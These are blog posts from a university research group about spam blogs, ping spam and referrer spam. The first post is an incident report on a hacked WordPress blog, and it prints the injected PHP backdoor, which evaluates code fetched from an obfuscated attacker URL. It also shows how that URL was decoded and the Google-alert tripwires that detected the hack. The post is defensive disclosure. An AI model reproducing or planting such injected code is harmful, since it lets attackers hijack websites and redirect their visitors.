Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
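The reversed URL is easy to undo. As a small illustration in Python (the injected code itself is PHP and calls strrev), reversing the string literal from the snippet recovers the address the rest of the payload was fetched from. The variable names are ours, not part of the exploit.

```python
# The string literal passed to strrev() in the injected PHP, copied verbatim.
obfuscated = "txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"

# Slicing with a step of -1 reverses a string, the Python equivalent of strrev().
payload_url = obfuscated[::-1]

print(payload_url)  # http://blogwp.info/detailed/example/pharm.txt
```

Hiding the address this way probably keeps a plain text search for the attacker's domain from matching the file-fetching part of the injected line.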

We discovered the problem through a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
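For anyone who wants to set up similar tripwires for several sites, here is a minimal sketch of how such query strings can be assembled. The helper name build_alert_query is hypothetical, and the sketch only builds the text of the query; the alerts themselves are still created by hand in Google Alerts.

```python
def build_alert_query(terms, site):
    """Join the terms with OR and restrict the search to a single site."""
    return " OR ".join(terms) + f" site:{site}"


# Term list taken from the second example alert above.
pharma_terms = ["viagra", "cialis", "levitra", "Phentermine", "Xanax"]

query = build_alert_query(pharma_terms, "ebiquity.umbc.edu")
print(query)
# viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
```

Keeping each alert to one family of terms makes it easier to tell at a glance what kind of spam an alert has caught.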

Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.

Storms on Planet Social Media Research

May 7th, 2009

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. (I was able to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to Feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way, we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us at planet-smr at cs.umbc.edu.

update 5/8: We’ve identified and solved the problem, thanks to Google Feedburner ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the Feedburner IP address in the server’s /etc/hosts table. I think we added it when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.
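A forgotten hosts-file entry like this can be caught by comparing what the file pins against what DNS currently returns. The following is only a sketch under stated assumptions: the host name, the addresses, and the helper names are made up for illustration, and the resolver is passed in as a function because the usual system lookup (for example socket.gethostbyname) typically consults /etc/hosts first and so would just echo the stale value back. A real check would need a lookup that queries DNS directly.

```python
def parse_hosts(text):
    """Map each hostname in hosts-file text to the IP address it is pinned to."""
    pinned = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            pinned[name] = ip
    return pinned


def stale_entries(pinned, resolve):
    """Return {hostname: (pinned_ip, current_ip)} wherever the two differ."""
    stale = {}
    for name, ip in pinned.items():
        current = resolve(name)  # resolve() returns None for unknown names
        if current is not None and current != ip:
            stale[name] = (ip, current)
    return stale


# Hypothetical data: documentation-range addresses and a made-up feed host.
HOSTS_TEXT = """
127.0.0.1     localhost
192.0.2.10    feeds.example.org   # temporary fix, remove later
"""
CURRENT_DNS = {"feeds.example.org": "198.51.100.7"}

stale = stale_entries(parse_hosts(HOSTS_TEXT), CURRENT_DNS.get)
print(stale)  # {'feeds.example.org': ('192.0.2.10', '198.51.100.7')}
```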

Spammers are using Amazon EC2

July 1st, 2008

The Washington Post’s Security Fix blog has a post, Amazon: Hey Spammers, Get Off My Cloud!, reporting on allegations that spammers are starting to use Amazon’s Elastic Compute Cloud (EC2) servers. It only makes sense: you can sign up easily without committing to a contract of any length, the price is low, and the IP addresses are drawn from a wide range, making it hard to block them all. Besides, if Amazon’s EC2 IP addresses all get put in a spam blacklist, it will be bad for their many legitimate users. It may be tricky for Amazon to police this.

Blog comment spam magnet

July 1st, 2008

A good fraction of the comment spam that makes it through our Akismet filter is from people who are trying to add a comment to one of our posts about spam blogs or comments. Here’s an example from today’s batch: a comment from Cameroon on a two-year-old post, Blog comment spam with plagiarized text: hard to spot, trying to promote the site africapresse.com.

“spam is a real problem in this day not just for .edu but for the entire internet world. Plagiarism is a problem too.”

It’s easy for me to classify this as spam since the comment was made on a very old post, is short, includes a reference to a site that looks commercial, and makes a few general and superficial statements that are not really tied to any of the post’s details.
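The first three of those cues are mechanical enough to write down. Here is a rough sketch, not what Akismet or our blog actually does: the Comment class, the spam_signals helper, and both thresholds are made up for illustration, and the fourth cue (generic statements not tied to the post) is left out because it needs real text analysis.

```python
from dataclasses import dataclass, field
from datetime import date


@dataclass
class Comment:
    text: str
    posted: date            # when the comment was submitted
    post_published: date    # when the post it targets was published
    links: list = field(default_factory=list)  # sites the commenter supplied


def spam_signals(comment, max_post_age_days=365, max_words=40):
    """List which of the simple cues fire; the thresholds are arbitrary guesses."""
    signals = []
    if (comment.posted - comment.post_published).days > max_post_age_days:
        signals.append("old post")
    if len(comment.text.split()) <= max_words:
        signals.append("short")
    if comment.links:
        signals.append("promotes a site")
    return signals


example = Comment(
    text=("spam is a real problem in this day not just for .edu but for the "
          "entire internet world. Plagiarism is a problem too."),
    posted=date(2008, 7, 1),
    post_published=date(2006, 7, 1),  # assumed date; the post is only described as two years old
    links=["africapresse.com"],
)
print(spam_signals(example))  # ['old post', 'short', 'promotes a site']
```

No single cue is convincing on its own, since plenty of legitimate comments are short or arrive late; it is the combination that makes this one easy to call.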

I think it’s ironic that so many SEO wannabes try to spam posts about spam. I guess they just have spam on the brain. So, I offer up this post as food for the comment spammers and their search and comment tools.

akismet, anti-spam, antispam, automated, automated, automatic, backlink, backlinks, bad behavior, blacklist, block, blocking, blog, blogging, capcha, comment, comment spam, comments, human, keywords, links, links, nofollow, pagerank, people, plagiarize, plagiarism, rank, search engine optimization, seo, spam, spam blogs, spam comments, spam karma, spamming, splog, splog, splogs, steal, target, trackbacks, traffic, typepad, wordpress.

Splogs and politics

July 1st, 2008

Here’s something I never expected: splogs as a political issue. Actually, it’s allegations of political blogs being splogs, or rather allegations that people are accusing political blogs of being splogs in order to get Google to block them. The NYT Bits blog has a post, Google and the Anti-Obama Bloggers, that describes the controversy.

“Did Google use its network of online services to silence critics of Barack Obama? That was the question buzzing on a corner of the blogosphere over the last few days, after several anti-Obama bloggers were unable to update their sites, which are hosted on Google’s Blogger service. … In an article that appeared on Bloggasm.com, the reporter Simon Owens spoke with some of the affected bloggers, who said they believed that Google had fallen prey to a campaign by activists supporting Senator Obama. According to the bloggers, the Obama supporters had clicked on a “flag” on the anti-Obama blogs alerting Google that they were spam.”

Maybe this is a good reason to rely on the judgment of machines, at least until they start running for office.

No spam on Twitter?!

February 25th, 2008

Can it be true? Russell Beattie posts that on Twitter there are nearly a million users, and no spam or trolls. Spam does exist on Twitter, of course, but it does seem to be less of a problem than in the blogosphere, on the Web or in email. Maybe it’s because search engines don’t treat tweets like Web pages or blog posts.

Sifry’s state of the blogosphere

February 6th, 2006

Technorati’s David Sifry has posted another State of the Blogosphere report with lots of interesting statistics. Highlights include

  • Technorati tracks 50K posts an hour from 27M blogs.
  • The number of blogs doubles every six months.
  • Splogs and spings are increasing.
  • Tagging is increasingly popular.

Half of Swoogle’s hits are from referer log spammers

February 4th, 2006

We are using bbclone to generate reports on Swoogle access. Look at today’s top 10 referers as of 3:00pm:

  www.legaladvocate.net  246     26.14%
  www.myjavaserver.com   152     16.15%
  www.google.com         125     13.28%
  dannyayers.com         44      4.68%
  lucky7.to              34      3.61%
  ebiquity.umbc.edu      25      2.66%
  www.google.de          18      1.91%
  planetrdf.com          18      1.91%
  mail.google.com        18      1.91%
  groups.google.com      14      1.49%

One and five are clearly spam sites and two is suspicious, too. The first, for example, appears to be about poker, though the site name is legaladvocate. The site’s text is obviously automatically generated nonsense. All of the links point to subpages in the same domain with a similar structure and content. I assume that once the site achieves a high PageRank, it will be repurposed or sold.

So, it seems like nearly 50% of our hits are due to referer log spamming. I’d guess Swoogle was picked by finding its URL on recent posts found on a blog search engine or a ping server.
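The "nearly 50%" figure can be checked directly from the table. This short sketch parses the ten rows exactly as listed and adds up the hits and percentages for referers one, two and five; the function and variable names are ours.

```python
REPORT = """\
www.legaladvocate.net  246     26.14%
www.myjavaserver.com   152     16.15%
www.google.com         125     13.28%
dannyayers.com         44      4.68%
lucky7.to              34      3.61%
ebiquity.umbc.edu      25      2.66%
www.google.de          18      1.91%
planetrdf.com          18      1.91%
mail.google.com        18      1.91%
groups.google.com      14      1.49%
"""


def parse_report(text):
    """Turn each 'host hits percent%' line into a (host, hits, percent) tuple."""
    rows = []
    for line in text.splitlines():
        host, hits, share = line.split()
        rows.append((host, int(hits), float(share.rstrip("%"))))
    return rows


rows = parse_report(REPORT)
suspect_ranks = (1, 2, 5)  # the referers flagged as spam or suspicious above

spam_hits = sum(rows[rank - 1][1] for rank in suspect_ranks)
spam_share = sum(rows[rank - 1][2] for rank in suspect_ranks)
print(f"{spam_hits} hits, {spam_share:.2f}% of all hits")
# 432 hits, 45.90% of all hits
```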

Splogs, like spam, will be with us for a while

January 24th, 2006

Two years ago Bill Gates predicted that the spam problem would be solved by now, as this article in The Register reports.

Hey Bill, why am I still getting spam?
Junk mail outlives MS mortality prediction
By John Leyden, 24 January 2006

Two years ago today Bill Gates predicted that spam email would be eradicated as a problem within 24 months. The Microsoft chairman predicted the death of spam in a speech at the World Economic Forum on 24 January 2004.

Gates outlined a three-stage plan to eradicate spam within two years. Microsoft’s scheme calls for better filters to weed out spam messages and sender authentication via a form of challenge-response system. Secondly, Microsoft wants to see a form of tar-pitting so that emails coming from unknown senders are slowed down to a point where bulk mail runs become impractical.

Lastly, and most promisingly as far as Gates is concerned, is a digital equivalent of stamps for email, to be paid out only if the recipient considers an email to be spam. Blocking spam email would appear to be a simple problem but in practice is far trickier than Gates, or indeed the industry, first thought.

It’s tempting to think that we are close to being able to solve the splog identification problem, which would enable blog search engines to weed the splogs out of their indices. But, I’ll bet that splogs will be with us for a long time, as is the case with spam. Of course, we do have to work hard to keep them under control, just as we do with spam. If we don’t, the blogosphere will be quickly overrun and its promise squandered.

UMBC blog research on splogs in Baltimore Sun

January 17th, 2006

Baltimore Sun’s Troy McCullough talks about Pranam Kolari’s work on detecting splogs in his column on Sunday, 15 January 2006. The column also has an associated podcast.

Fighting spam sites – latest battle in the blog wars
On Blogs: Troy McCullough, Jan 15, 2006

It seems that everyone has a blog these days – a spot that others can visit to find out what they have to say about something or nothing in particular. Some blogs are widely valued fonts of specialized wisdom, but many are viewed as uninteresting expressions of personal ego. The difficulty of sorting the good blogs from the bad can be a frustrating challenge – one that is seen as a serious threat to what has been viewed as a vital feature of the Internet.

Now, three University of Maryland, Baltimore County researchers have made a far more disturbing conclusion about blogs. After analyzing millions of blog posts, they have determined that the blogosphere is drowning in spam, the pejorative nickname given to unsolicited Internet advertising. Using data collected by weblogs.com, a prominent blog tracking service, doctoral student Pranam Kolari and professors Tim Finin and Anupam Joshi analyzed 40 million blog updates submitted from 14 million blogs.

Welcome to the Splogosphere: 75% of new pings are spings (splogs)

December 15th, 2005

In the blogosphere, pings are notifications sent by updated blogs to PingServers. A major issue recently has been unjustified pings, also known as Spings, sent by Splogs. Splogs have been discussed a lot recently, including an interesting thread on post piracy that Steve Rubel initiated on Micropersuasion.

The problem of splogs prompted us to analyze pings from weblogs.com, which publishes hourly pings as changes.xml. We have been collecting these pings over the last 4 weeks for a total of 40 million pings from around 14 million (so claimed) blogs. To begin with, we fetched these blogs and applied a language identification technique implemented by James Mayfield. As expected, most of the pings were from blogs authored in English. But we were able to identify blogs in many other languages as well. For instance, the charts below show the distribution of pings from blogs authored in Italian, over a day and over a week. Each bar denotes the number of pings per hour.

Pings over a day
Pings over 8 days

All times are in GMT; clearly, Italian-authored blogs display a specific blogging pattern.
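For readers who want to build similar pings-per-hour charts, here is a minimal sketch of the bucketing step. It is not our actual pipeline. It assumes the changes.xml layout as we understand it: a weblogUpdates root with an "updated" timestamp, and one weblog element per ping whose "when" attribute gives seconds elapsed before that timestamp. The sample document and blog URLs are invented.

```python
import xml.etree.ElementTree as ET
from collections import Counter
from datetime import timedelta
from email.utils import parsedate_to_datetime

# Invented sample in the assumed changes.xml layout.
SAMPLE = """<weblogUpdates version="2" updated="Thu, 15 Dec 2005 12:30:00 GMT" count="3">
  <weblog name="Blog A" url="http://a.example.org/" when="60"/>
  <weblog name="Blog B" url="http://b.example.org/" when="1200"/>
  <weblog name="Blog C" url="http://c.example.org/" when="2400"/>
</weblogUpdates>"""


def pings_per_hour(xml_text):
    """Count pings in each GMT hour, keyed by 'YYYY-MM-DD HH:00'."""
    root = ET.fromstring(xml_text)
    updated = parsedate_to_datetime(root.get("updated"))
    counts = Counter()
    for weblog in root.iter("weblog"):
        # "when" is assumed to be the ping's age in seconds at publication time.
        ping_time = updated - timedelta(seconds=int(weblog.get("when")))
        counts[ping_time.strftime("%Y-%m-%d %H:00")] += 1
    return counts


hourly = pings_per_hour(SAMPLE)
print(dict(hourly))  # {'2005-12-15 12:00': 2, '2005-12-15 11:00': 1}
```

Summing these counters over the files collected for a day or a week gives the bar heights; filtering the weblog elements by detected language first gives a per-language chart.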

In the next step we used our work on splog detection to detect splogs (and hence spings) among the English blogs. Our detection mechanism is close to 90% accurate. As shown in the charts below, pings from blogs average around 8K per hour and those from splogs average around 25K per hour.

Blog Pings
Splog Pings

Clearly almost 3 out of 4 pings are spings! Going back further to the source of these spings, we observed that more than 50% of claimed blogs pinging weblogs.com are splogs.
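The "3 out of 4" figure follows from the two hourly averages quoted above. A quick check, using the rounded numbers from the text:

```python
blog_pings_per_hour = 8_000     # "around 8K per hour"
splog_pings_per_hour = 25_000   # "around 25K"

# Fraction of all pings that come from splogs.
sping_fraction = splog_pings_per_hour / (blog_pings_per_hour + splog_pings_per_hour)
print(f"{sping_fraction:.1%}")  # 75.8%
```

Since the detector is only close to 90% accurate and the averages are rounded, this should be read as an estimate rather than an exact proportion.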

Given how interesting these preliminary statistics are, the scope for further analysis, and the interest in the resulting dataset, we decided to continuously monitor the pingosphere. So, we now do it “live” on updated blogs published by weblogs.com (delayed by an hour), and have made the results publicly available at http://memeta.umbc.edu. The site lists blogging patterns for many other languages, and compares splogs with blogs. All of our work is part of a larger project, memeta, aimed at analyzing the content and structure of the blogosphere.

We hope our effort is a good complement to existing services (e.g., FightSplog, SplogReporter and SplogSpot) towards combating splogs. We currently publish only simple ping statistics on this site, but do stay tuned for fresh splog and classified blog dumps and much more!

UPDATE: Matthew Hurst from BlogPulse points us to an interesting analysis he has done on a day of weblogs.com pings.